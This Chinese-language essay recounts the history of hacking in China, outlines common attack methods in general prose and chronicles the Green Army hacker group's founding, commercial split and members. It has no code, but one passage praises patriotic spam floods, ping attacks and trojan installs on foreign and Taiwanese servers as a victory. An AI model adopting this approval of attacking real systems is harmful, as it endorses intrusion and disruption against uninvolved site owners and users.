第一章：什么是黑客？

1，黑客的定义

提起黑客，总是那么神秘莫测。在人们眼中，黑客是一群聪明绝顶，精力旺盛的年轻人，一门心思地破译各种密码，以便偷偷地、未经允许地打入政府、企业或他人的计算机系统，窥视他人的隐私。那么，什么是黑客呢？

黑客（hacker），源于英语动词hack，意为“劈，砍”，引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中，“黑客”则有“恶作剧”之意，尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中，对黑客的定义是“喜欢探索软件程序奥秘，并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样，只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中，我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识，并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全，他们以保护网络为目的，而以不正当侵入为手段找出网络漏洞。

另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作（如用暴力法破解口令），他们也具备广泛的电脑知识，但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。

一般认为，黑客起源于50年代麻省理工学院的实验室中，他们精力充沛，热衷于解决难题。60、70年代，“黑客”一词极富褒义，用于指代那些独立思考、奉公守法的计算机迷，他们智力超群，对电脑全身心投入，从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索，为电脑技术的发展做出了巨大贡献。正是这些黑客，倡导了一场个人计算机革命，倡导了现行的计算机开放式体系结构，打破了以往计算机技术只掌握在少数人手里的局面，开了个人计算机的先河，提出了“计算机为人民所用”的观点，他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧，例如破解口令（password cracking），开天窗（trapdoor），走后门（backdoor），安放特洛伊木马（Trojan horse）等，都是在这一时期发明的。从事黑客活动的经历，成为后来许多计算机业巨子简历上不可或缺的一部分。例如，苹果公司创始人之一乔布斯就是一个典型的例子。

在60年代，计算机的使用还远未普及，还没有多少存储重要信息的数据库，也谈不上黑客对数据的非法拷贝等问题。到了80、90年代，计算机越来越重要，大型数据库也越来越多，同时，信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了黑客们的极大反感。黑客认为，信息应共享而不应被少数人所垄断，于是将注意力转移到涉及各种机密的信息数据库上。而这时，电脑化空间已私有化，成为个人拥有的财产，社会不能再对黑客行为放任不管，而必须采取行动，利用法律等手段来进行控制。黑客活动受到了空前的打击。

但是，政府和公司的管理者现在越来越多地要求黑客传授给他们有关电脑安全的知识。许多公司和政府机构已经邀请黑客为他们检验系统的安全性，甚至还请他们设计新的保安规程。在两名黑客连续发现网景公司设计的信用卡购物程序的缺陷并向商界发出公告之后，网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛，那些发现和找到该公司产品中安全漏洞的黑客可获1000美元奖金。无疑黑客正在对电脑防护技术的发展作出贡献。

2，黑客攻击

一些黑客往往回采取一些几种方法，但是我很想说的是，一个优秀的黑客绝不会随便攻击别人的。

1）、获取口令 　

这又有三种方法：一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；三是在获得一个服务器上的用户口令文件（此文件成为Shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是黑客获得口令的Shadow文件。此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器，而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。

2）、放置特洛伊木马程序 　　

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时，这个程序就会通知黑客，来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

3）、WWW的欺骗技术 　　

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。

4）、电子邮件攻击 　　

电子邮件攻击主要表现为两种方式：一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。

5）、通过一个节点来攻击其他节点 　　

黑客在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些技术很难掌握，如IP欺骗，因此较少被黑客使用。

6）、网络监听 　　

网络监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

7）、寻找系统漏洞 　　

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，win98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在网络文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。

8）、利用帐号进行攻击 　　

有的黑客会利用操作系统提供的缺省账户和密码进行攻击，例如许多UNIX主机都有FTP和Guest等缺省账户（其密码和账户名同名），有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。

9）、偷取特权 　　

利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击，前者可使黑客非法获得对用户机器的完全控制权，后者可使黑客获得超级用户的权限，从而拥有对整个网络的绝对控制权。这种攻击手段，一旦奏效，危害性极大。

第二章：中国电脑黑客起源

1，中国黑客的起源（1994年－1996年）

1994年，是中国互联网处于刚刚开始发展的朦胧时期，也就是在这一年，中国互联网的大门终于面向公众开放了。但是在那个年代，电脑还是一件非常奢侈的电子用品，而互联网对于大众来说更是一个陌生的名词，我们只有在专业性极强的书刊中能够找到与网络相关的名词，而那些上网的群体也多数为科研人员和年轻知本家（那个时候小资群体还没有提出）。各地电脑发烧友最大的乐趣就是COPY那些小游戏和DOS等软件类产品，盗版对我们来说还是一个陌生的名词，对于广大计算机用户来说，COPY就是正版的一种传播方式。于是乎那个时代最早的黑客或者说“窃客”诞生了。那个时候我们没有太多的理想和豪言壮语，一个全新的小软件就几乎是我们计算机的全部生命与理解，而对于这些窃客来说能够COPY到国外的最新产品是他们最大的荣幸，那一张张的小软盘中承载了中国黑客最初的梦想。也正是从那个时期起，雷军等众多我们现在熟知的人从这里引领起中国软件与互联网业发展的浪潮。

在那个中国网络最为朦胧的岁月里，大多数玩家操作着比9600 Bits/s还小的雏猫，在最为原始的网络上奔驰。那不是我们现在传统意义上的Internet，而是最为初级的BBS站，一种依靠拨电话号码直接连接到BBS服务器上的方式来交流。他们上的最多的是中国惠多网，而非Internet。足球和软件加解密成为最热门的话题，注册码的交换让许多人乐此不疲。更多的BBS方式的服务器在全国各大城市出现，软件的交换破解成为最为热门的话题，单单一套Linux就能够卖到1200元。那个时代的玩家现如今均已成为了驰骋互联网的风云人物。

时光转眼到了1996年，在中国网民的年代分类中，在1996年以前接触网络的人均被称之为中国的第一代网民，或许在这其中有些人从来没有接触过Internet，所接触的最多也是那种电话连接的BBS，但是他们仍然无愧于中国第一代网民。1995年－1996年这一期间，中国各个大中城市的互联网信息港基本已经初具规模，中国国际互联网的第一代网管诞生，中国第一代的大众网民也开始走出BBS，而融入这种天地更为广阔的Internet。那两年是中国互联网初步成长时期，也同样是中国软件业开始蓬勃发展的时期。那个平静的年头中，中国网络人以自己的方式做着自己的梦，在这些人中很多是接触过早期BBS的网友，在他们看来，从BBS移师Internet只不过将自己的舞台扩大了一些，让自己的眼睛看得更多了一些。而他们在BBS上最初所进行的那些活动也迁移到了Internet这个更为广阔的空间。在这一期间中国网络窃客技术飞速发展，也从此诞生了一批传奇式人物，这里面最为出名的当属高春辉，他的个人主页在当时以破解软件和注册码为主，在那个软件极度匮乏的时期，他创造了中国个人网页访问量第一的传奇历史。当然在那个阶段，除了窃客以外，电话飞客也曾出现在中国，但是由于程控交换机的出现，飞客很快的成为了历史。1996年底，中国电信开始实行优惠上网政策，在此之后中国网络开始了真正步入百姓家庭的步伐。

2，有些名字我们不得不提起：

　　周志农－自然码发明人，开创大自然BBS站。

　　马化腾（Pony Ma）－滕讯公司总裁，中国惠多网第一批网友。

　　求伯君－金山公司总裁，开创西线和西点BBS站。

　　罗依（Roy Luo）、钟东（Dr.Arab）、潘德强……

　　这些我们熟悉或者不太熟悉的人们，在那个年代，以他们特有的方式进行着中国网络人特殊的梦，也以他们的方式孵化出中国第一代黑客的雏形－窃客。

第三章：中国电脑黑客的成长

1，温故1997至1999——

　　1997年在中国互联网发展史应该是最为值得纪念的一年，而在中国黑客成长过程中，那一时期也哺育了众多的初级黑客，互联网这一个名词也逐渐被大众接受，新的思想，新的观念也逐渐从网络中折射出来。在1997年初期，YAHOO搜索引擎中只能够搜索出7个跟黑客相关的简体中文网页。而且网站中的内容多数是翻译或者重复国外相同网页的内容，很多没有实际意义。不过此时“黑客”这一个名词已经开始正式的深入广大网友之中，当时初级黑客所掌握的最高技术仅仅是使用邮箱炸弹，并且多数是国外的工具，完全没有自己的黑客武器，更不要说自己的精神领袖。那个时期世界上的黑客共同有追随着一个精神领袖：凯文?;米特尼克，世界头号黑客。这位传奇性人物不单单的领导着美国黑客的思想，也影响着中国初级黑客前进与探索的方向。

　　1998年正当我们国内开始轰轰烈烈的开展互联网大跃进活动的时期，在大洋彼岸的美国，一年一度的黑客大会上由一个名为“死牛崇拜”黑客小组公布了一款名叫“Back Orifice”的黑客软件，并将源代码一起发布。这个软件掀起了全球性的计算机网络安全问题，并推进了“特洛伊木马”这种黑客软件的飞速发展。BO公布后，透过刚刚兴起的互联网迅速传到了中国，当时很多网友就是使用这款软件开始了对黑客生涯的初恋。但是BO并没有在中国掀起浪潮，当然因素是多种多样的，比如网络尚在发展中，BO为舶来品不方便中国网友使用等。但是BO没有辉煌的另一个主要原因是CIH病毒的诞生和大规模发作。这个有史以来第一个以感染主板BIOS为主要攻击目标的病毒给中国经济带来了数百亿元的损失，也让大陆黑客第一次感受到了来自海峡对面的野心与威胁。

　　1998给还处在发育期的中国黑客带来了太多的惊奇、恐惧、理想与动力。在BO诞生不久，中国黑客自己的特洛伊木马也诞生了，这就是网络间谍NetSpy。但是NetSpy的诞生并没有给中国黑客的发展带来太大的震动，这一切都让CIH的光芒所掩盖了。在随后的日子里以谢朝霞、PP（彭泉）、天行（陈伟山）等为代表程序员黑客开始显露头角，少量的国产工具开始小范围流行于中国黑客之间。当大家正在忙于为杀毒而忙得不可开交的时候，一次国际性事件掀起了中国黑客首次浪潮。

　　1998年7－8月份，在印度尼西亚爆发了大规模的屠杀、强奸、残害印尼华人的排华事件。众多华人妇女被野蛮的强奸杀害，华人的超市被抢夺一空，很多丧失人性的印尼反华分子还将大量残害华人的图片发到了互联网上。这一系列行为激怒了刚刚学会蹒跚走步的中国黑客们，他们不约而同的聚集在IRC聊天室中，并以八至六人为单位，向印尼政府网站的信箱中发送垃圾邮件，用Ping的方式攻击印尼网站。这些现在看来很幼稚的攻击方法造就了中国黑客最初的团结与坚强的精神，为后来的中国红客的形成铺垫了基础。为了号召更多的人加入战斗，有几位技术性黑客牵头组建了“中国黑客紧急会议中心”负责对印尼网站攻击期间的协调工作。印尼排华事件造就了一大批网友投身于黑客这项活动中来，有些人在攻击过后又回到了现实生活中，有些人则从此开始了对黑客理想的执著追求。同样这次事件也使得“绿色兵团”这个黑客组织的名字享誉中国互联网，并造就了后来的“中联绿盟”。

　　轰轰烈烈的印尼排华事件过后，中国黑客似乎又回归于平静，继续着对理想的执著追求与探索，UNIX、Linux、Http、FTP等网络技术性问题和黑客技术成为了中国黑客的主要话题，无力的反击让中国黑客开始有了新的反省，同样也激励起他们旺盛的斗志，他们如饥似渴的摄取技术养分，黑客技术性网站也开始逐渐增多，新的黑客技术高手也再次涌现，这一时期最具代表性的技术性黑客当属流光、溯雪、乱刀等黑客软件的开发者－小榕，以后的日子中，小榕执著的追求着自己的理想，使流光等这些优秀的软件在一次次升级与完善中走进了世界优秀黑客软件的舞台。

　　1999年中国的互联网用户突飞猛增，创造了历史同期增长最快的水平，但是那一年也成为了每一个中国人和中国黑客难忘的一年，这一年在中国黑客发展的历史上是永远不可抹掉的一笔。那一年的4－5月份以美国为首的北约以种种借口对南斯拉夫塞尔维亚共和国发动了战争，随后的日子里中国人民在各种媒体发表了对正义的声援，网络上更是掀起了对美国霸权主义的批判浪潮。但是就在5月份，美国的轰炸机竟悍然轰炸了我驻南联盟大使馆。消息一经传出，举国上下为之震惊与愤怒，全国各高校学子更是义愤填膺，水木清华等全国各大网站论坛的帖子与信息流量达到了历史的最高峰。

　　在战争的初期，中国黑客的行动仅仅限于声援南联盟人民，并没有采取过多的过激行为。但当我驻南联盟大使馆被毫无理由的轰炸后，中国黑客又一次大规模的团结了起来，纷纷开展了对美国网站的攻击。一直作为奋斗理想的美国黑客精神迅速的被遗弃了，一时间，中国的黑客没有了自己心目中的精神领袖，有的只是满腔的愤怒。在中国大使馆被炸后的第二天，第一个中国红客网站诞生了，同时也创造出了一个新的黑客分支－红客。中国红客网站长分析家在看完中午的新闻后，以半个小时的时间做完了这个网站，并初步定名为“中国红客之祖国团结阵线”（随后的7月份改名为中国红客之祖国统一战线），以宣扬爱国主义红客精神为主导，网站宣言中不乏铿锵激扬的爱国词语，并引用了毛泽东青年时的话语：“国家是我们的国家，人民是我们的人民，我们不喊谁喊？我们不干谁干？”极负煽动力。网站在短短的数天内访问量已达50多万，并出现在新浪网的新闻链接中，中国红客从此成为了世界黑客中特殊的一个群体，爱国与团结是他们永恒的精神理念。那次黑客战争中，全世界的华人首次团结一致，众多美国网站被攻击，大规模的垃圾邮件也使得美国众多邮件服务器瘫痪失灵，这次伟大的卫国黑客战争取得了全面的胜利。

　　一切刚刚回归宁静不久，就在七月份，台湾李登辉突然抛出了两国论，海峡两岸局势顿时紧张。中国黑客依靠由对美网络反击战中总结出的经验，迅速的攻击了台湾行政院等网站，并给许多台湾服务器安装了木马程序，导致很多鼓吹**的网站服务器长时间瘫痪。值得一提的是，此次安装的木马程序由美国的BO首次改为了中国黑客自己研发的“冰河”与NetSpy。而木马冰河也成为了中国黑客最为钟爱的木马程序。

　　木马冰河是中国黑客史中必须提到的一个软件，它由中国安全程序员黄鑫编写，黄鑫在最初开发这个软件最初版本的时候并没有考虑到它能够作为一个特洛伊木马来使用，但随后冰河疯狂流行于黑客手中，很多用户在不知不觉中被冰河控制。早期的冰河还不能算是一个好的木马软件，随后黄鑫用了大量的时间对冰河进行代码重构，冰河2.2版本诞生了。新版本的冰河迅速被流传出去，并让大批初级黑客快速的步入了黑客这扇大门。中国黑客软件的开发从此走向了新的纪元，再次之后，黑洞、网络神偷、灰鸽子、XSan、YAI等众多优秀的国产黑客软件纷纷涌现，黑客也开始出现商业化迹象，由前“绿色兵团”成员组建的“中联绿盟”网络安全公司成立，正式开始了黑客向商业化迈进的脚步，中国黑客逐渐成长了起来。

第四章：中国“绿色兵团”

1，“绿色兵团的成立及发展。提起中国的黑客，我们没办法不提到这个被众多网民誉为网上“黄浦军校”的中国最早的电脑黑客组织：绿色兵团。

　　我国最早一批黑客大约出现在１９９４年，其黑客行为持续到１９９９年底。代表性的组织就是ＧＯＯＤＷＥＬＬ（龚蔚）等五人组织的绿色兵团。据称，极盛时期注册会员达到３０００多人，成员遍布全国各地。谢朝霞、彭哥、ＰＰ（彭泉）、天行（陈伟山）、黄鑫是第一代黑客中的顶级高手。他们的特点是，自己深入研究网络安全技术（换一个名称就叫黑客技术），有自己的理论和产品。现在他们都已经是网络安全方面的专家了！

　　“绿色兵团”是中国大陆最大最早的民间黑客组织之一。创始人goodwell1997年在外网站申请一免费空间并在国内多处做了镜像站点，当初起名为绿色兵团，原地址”i.am/hack1“。作为最早的中国黑客组织，绿色兵团成员在短期里成员迅速状大！上海、北京、石家庄等地均由其主要成员分布。同时，其影响力也在网民之中大增，特别是与与网易的几次冲突，使绿色兵团名声大振。　　 1999年1月23日，绿色兵团在上海召开兵团第一次年会。地点为上海延安东路128弄6号(星空网吧)。1999年7月15日，绿色兵团转轨拥有了自己的服务器和自己的安全公司：上海绿盟计算机网络安全技术有限公司，启用域名isbase.com开站，公司名同年10月正式注册成功。

　　2000年3月，中联公司以合作为名，在北京注册公司：北京中联绿盟信息技术公司，合作期间，两站使用同一标志标志由北京公司设计，上海公司所有成员为老成员，北京公司大多为新招暮成员，上海公司所有的费用、办公场地、办公用品、工作开展等等大多为北京中联绿盟科技提供。2000年7月，北京公司与上海公司因内部原因，双方合作破裂，北京公司启用新域名nsfocus.com。据说，双方冲突非常强烈，彼此亦对对方不断进行黑客攻击。8月底，北京公司向法院起诉上海公司，上海公司败诉。10月份，上海公司作价30万左右将公司包括域名isbase.com转让给北京公司，人员解散。北京公司将isbase.com域名停用。

2，“绿色兵团“关闭的原由。

　　2000年12月，某网站以前黑客组织绿色兵团发生“兵变”一事为由在网上发布独家报道，引起媒体关注。

（以下是绿色兵团原主要成员高永安的一段采访记录）

　　这次纠纷其实没什么大不了的，关键是原来绿色兵团上海的以GOODWELL为首的三个人宣称是绿色兵团的创始人和拥有者。我们不否认绿色兵团这四个字是GOODWELL提出来的，因为当时他的个人主页确实是叫这个名字，但是如果因为名字是谁起的就归谁所有，我想也过不大去吧？按这样的道理，名字应该归任天堂公司所有。因为这四个字是原来该公司一个游戏的名字。

　　我是在去年下半年加如绿色兵团的，当时我们北京部分规模还很小，也就几个人租了一个三居室的房子进行活动。这些北京的后来加入者比较早就发现网络安全是一个大有可为的天地，更因为我们对网络安全也有强烈的个人爱好。因此在北京也算了聚集了一批真正的高手。

　　原来的绿色兵团由于是一个黑客主页，因此在当时遭到了各虚拟主机提供商的围剿，有一年多时间都陷于停顿状态。因此我们北京的沈总经理(现在中联绿色盟的领导者)专程奔赴上海，意图进行商业化运作，注册了上海绿盟。由于沈不是上海户口，为了避免麻烦，就用了原绿色兵团三人之一的于刚为法人。

　　我们在北京正式做了一个站点，租了服务器，这就是后来的isbase.com。但我敢负责任的说，在开站这一年多的时间里，(绿色兵团)上海方面没有对这个站点做过哪怕一个标点的贡献，所有内容全是北京做的。

　　绿色兵团从无到有到如日中天到商业化运作都是北京部门做出了最大的贡献。我们从未否认过这三个人是概念的提出者和我们的核心成员，待遇上也都是一视同仁。

　　北京部分在商业化过程中，新组成了一个叫中联绿盟的公司，在英属开曼群岛注册的。是一个海外独资企业，此后就任命于刚为上海分公司经理，并一共拨去27万资金。我们这边由于有一段时间一直在忙于公司的商业运作，对原来的ISBASE的管理就停止了一段时间，但是在今年六月份的时候，我们发现，域名的管理权已经被上海方面私自转走。

　　在与上海方面的交涉中，上海方面提出要求原来创始绿色兵团的六个人应该坐在一起开个股东会，来决定公司的法律结构。我没有接受：原来的绿色兵团是个个人主页，而现在的绿色兵团是个国际化的公司，由六个人来决定六十个人的公司的前途显然是不合理的。我当时要求他们把域名无条件转回去，放弃这种要求，但当即被他们拒绝。

　　事已至此，我们最后只好做出决定：中联绿盟不再使用ISBASE的域名，我们认为我们的价值不在域名而在于我们的人，因此我们后来就取了一个新域名，弃用了原来的域名。中联绿盟公司做出决定，把这几个人开除，并向法院起诉原上海公司，要求归还当初所拨27万元的开办经费。

　　结果我们胜诉，经调解。对方以原来的ISBASE域名低偿债务。我们接手这个域名后当即将这个域名废止。

　　这件事情本来很简单，但经过某网站编辑在未经过采访的情况下写了一篇文章，讲什么绿盟兵变，吸引了大家的注意力。我们有六十多个员工，现在只不过是开除了三个员工，实际上是很小的一件事。原来的绿色兵团的黑客高手backend,袁哥等现在都还在北京公司。

　　我认为这件事情的关键是原来的几个绿色兵团成员提出了与自己贡献不符的过分要求，他们六个人要决定公司整体的股权和期权的分配显然是不合适的。　　

=============================================================

背景资料：

绿色兵变”爆出惊人内幕 (转摘）

　　12月1日晚大约8点多，在绿色兵团基地（irc.sunnet.org[202.109.72.40]:6667的#isbase频道）发生了大规模的争吵，这是继几次分裂事件以来，绿盟最大规模的内讧。袁哥化名大兔子参与了讨论，上海绿盟的创始人goodwell、coldface等都在场，补天（patching.net）的yagami、坏男孩俱乐部的badboy和本站的一位网管同时在场，见证了整个过程。前后持续约3个小时，会场次序非常混乱，不断有人捣乱。

　　绿色兵团北京站-网络力量站长coldface首先指出曾委托阿新发表了一篇关于绿色兵团现状的申明，但是一些媒体未经授权擅自修改申明内容，违反申明原意，并指出此前媒体的一些报道失实，不仅引用上面未经证实的内容，还将绿色兵团基地误写成202.101.6.5:6667的#isbase频道。最后，未得出最终结论，双方不欢而散，记者立即采访了上海绿盟的创始人goodwell，终于揭开了绿色兵团的所谓内讧真相。

　　原来上海绿盟（简称上绿）在中联绿盟（简称中绿）分道扬镳之后，因故欠了中联绿盟一笔数目不大的款子，被法院判定暂时抵押办公地点和域名、服务器，使得绿盟站点停止服务无法访问。据goodwell介绍，本来他们不会遇到资金周转的问题，只是因为他们中的一个主要成员突然去世（年仅28岁的rocky），使得他们放下了所有的事务。据信，他们的站点将会很快恢复，本站将会继续为大家做追踪报道。

以下是谈话记录：

皮鲁：你是早期绿盟成员么，当时组建有谁？

coldface：应该说是绿色兵团，是solo,littlefish,goodwell,dspman,rocky...

皮鲁:过去现在成员都在干什么？这也是大家很关心的问题。

coldface:呵呵，以前是开绿盟公司，上了中联绿盟的当后，又被赶尽杀绝，rocky死了，别人暂时失业.

皮鲁:rocky死了是怎样去世的，内讧到底是怎么回事？

coldface:rocky：是出车祸死的，(此处省略）因为他死了以后，大家都忙着他的后事，耽误了很多业务，结果中联出来要钱，所以才出现了现在这个样子。

皮鲁：(此处省略）

coldface：(此处省略）

皮鲁：中联和上海绿盟都属商业站么？

coldface：是的，中联以前是上海出来的，但是拿了上海的钱自己做公司，又接受了一些投资，就翻脸不认人了。

皮鲁：建站的初衷是建商业站么？

coldface：不是，是利用商业来继续推动组织的发展。

皮鲁：现在绿盟的状况是大家最想知道的了，你可以简单解释一下么？

coldface：现在上海绿盟的东西都抵押给了中联，所以站无法开了。

皮鲁：网络力量是属你个人还是绿盟？

coldface：是我个人建立起来的，但是我是想把他建立成为属于大家的非赢利组织，前身是绿色兵团北京站。

皮鲁：谈谈你吧。。。你一直在网络公司？

coldface：是的，在一些网络公司做与安全无关的事情，因为我把研究安全作为一种享受。

皮鲁：你对中国网络安全怎么看？

coldface：还没到正常发展期，但是国外安全业已经压迫而来了

皮鲁：网络力量是想做重组的绿盟还是新的安全网络站？

coldface：还没到正常发展期，但是国外安全业已经压迫而来了。

coldface：网络力量不是绿色兵团

皮鲁：那么你的发展方向在哪？

coldface：我们最终的方向可能是商业机构赞助的非赢利组织，免费为大众服务。

皮鲁：那么绿盟呢，只有中联绿盟了么？

coldface：绿盟事实上已经是中联的了，但是绿色兵团还是我们的

皮鲁：绿色兵团现在要重建么？

coldface：是的

皮鲁：中联绿盟的实力很强呀，象袁哥。。。还会合作么？

coldface：合作不期望。。。

皮鲁：有什么近期规划吗？

coldface：近期是把绿色兵团稳定下来，然后再图发展。

皮鲁：稳定在什么方面呢？

coldface：在组织方面，为大众服务

皮鲁：技术方面呢，有合作或联盟意向么？

coldface：是的，我们将和一些媒体合作，推出实物杂志

皮鲁：带商业性质的么？

coldface：不，至少现在还不行。

皮鲁：天极网在北京召开的“黑客”大会纪实你参加了么？

coldface：没有，其实那时我公司在天极网楼下

皮鲁：当中有中联绿盟的人，你接触了么？

coldface：我没有去

皮鲁：中国鹰派这次的成立你怎样看？

coldface：我还没听到消息啊

皮鲁：黑客会议当时有北京绿盟的高手，指的是谁呀？

coldface：不清楚，没见到

皮鲁：上海绿盟、中联绿盟、北京绿盟是三家解体？上绿的状况如何？

coldface：中联绿盟和北京绿盟是同一家，在中联没得到投资以前他就叫北京绿盟，上海绿盟被这一搞，基本没有了。

皮鲁：上绿的成员倾向那边，现在怎样？

coldface：上海绿盟的人才是绿色兵团的主力

皮鲁：那么按你说，现在中联绿盟的成员呢？

coldface：他们基本不是绿色兵团的，是中联招募的。

皮鲁：近期你们会有大的举措么，如关心台海局势。。。

coldface：呵呵，技术不被政治利用才可以正常发展！

皮鲁：政治应该说是技术的基础吧。

coldface：呵呵，现在而言，发展确实是建立在政治稳固的基础上，(此处省略）

皮鲁：爱国热情是不被技术左右的。

coldface：那是当然，而是技术通常被一些所谓的爱国热情所左右的。

皮鲁：呵呵。。同感。。。

coldface：呵呵，有一个清醒的头脑总是好的

皮鲁：网络安全是绿色兵团的技术最终目的？

coldface：是的，知道攻击才知道防守

皮鲁：呵呵。。多此一问。你认为现在好的中国黑客高手有么？

coldface：有，隐藏在网络管理员里

皮鲁：今天也谈了很多，谢谢你了，我可以公开我们的谈话么，你有补充么 ？

(此处省略）

皮鲁：呵呵。。。明天见报（我的站）

第五章：中国”绿色兵团“代表人物介绍

（本文引用GOODWELL写的绿色兵团的战友录）

Rocky:请允许我把这个人的名字放在第一位，并致以最沉痛的悼念，早期的绿色兵团核心成员，美国国防部的web site上曾留下过他为祖国的呐喊，绿色兵团早期的文章由他翻译。我依然记得四年前rocky第一次进入我的linux ,当时他的激动和喜悦，然而今天他却永远的离开了我们，走的这么突然。我会记得你，大家会记得你，直到永远、永远，我的朋友--Rocky。

Dspman(HeHe):绿色兵团核心成员，为人和气，讲义气，做事情大大咧咧。但是Unix基础相当过硬。

Solo:绿色兵团核心成员，美丽的solo，精通数据库，做事比较重感情，曾第一个提出SQL查询语句的严重漏洞。

LittleFish(小鱼儿）:绿色兵团核心成员，要是上天再给我一次机会的话，我还是愿意和他做朋友。因为我爱他。果断的性格，冷俊的言语是一个天生的黑客。当年我曾对他说，我们要做一个中国最大的网络安全组织，鱼儿回答我说：“不！，我们要做亚洲最大的。”这句话我永远记得，我会去努力的，即使一事无成。

Blackeye:绿色兵团核心成员，是个具有商业头脑的人，曾为绿色兵团商业化做过很多的付出和努力，中国黑客走到商业化道路和这个名字分不开。

笛亚哥:是一个很老很老的朋友，也许很多人已经遗忘了这个名字，但是我一直在寻找他，曾编写当时来说比较实用的文章（绿色兵团黑客教材）。

冰人:一个人彻底的消失很难尤其是这样出名的一个人物，早期的中国黑客没有不知道这个名字的，但是他的确做到了，彻底的从网络这个世界消失了。

jianyuf:几年前是绿色兵团聊天室的常客，大家一起学习一起进步，对技术他完全不保留。

中国鹰派:绿色兵团早期成员，擅长加密破解曾参加过第一次的绿色兵团年会。为组织出谋化策是个铁杆成员现在中国鹰派发展迅速，成员分布中国各地，和他的努力分不开。

Frankie:辰光站长，说到深圳辰光无人不晓，是中国出名的一个安全站点。

Iamin:97年绿色兵团站点第一万个访客，当时他的站点和绿色兵团是两个主要的安全大站。其安全站点黑客之家也是当初最出名的站点。

袁哥:我非常敬佩的一个程序员，非常实干，热于助人，技术相当过硬，而且看程序有耐心。不管发生什么，他都是我敬佩的一个程序员。

Adam:chinaasp的安全版版主，相识很偶然，很好客和热心，就是喜欢开开小玩笑,借我的那本书不知道啥年头可以还我。

Davidchen(backend):翻译过很多技术文章，很多经典的安全文章出自他的手。

Cloudsky:清华bbs斑竹之一，写过很多好文章。

CK:一个广洲的年轻小伙子，绿色兵团成员，非常好学。

PP:一个老朋友，为中国网络安全做过很多贡献，喜欢在网络上打报不平。

ColdFace:绿色兵团分站网络力量站长，脾气比较大，但是为组织做过很多事情，纯ORG的强烈拥护者。

小榕:从乱刀到流光，用过的人都知道这个名字，他是一个专门开发安全工具的程序员。

Zer9:我非常喜欢的一个朋友，气量很大，代表作品，代理猎手高度分析等。

天行:天行软件的作者，应该不用介绍了，要是你不知道就去用一下他的软件。

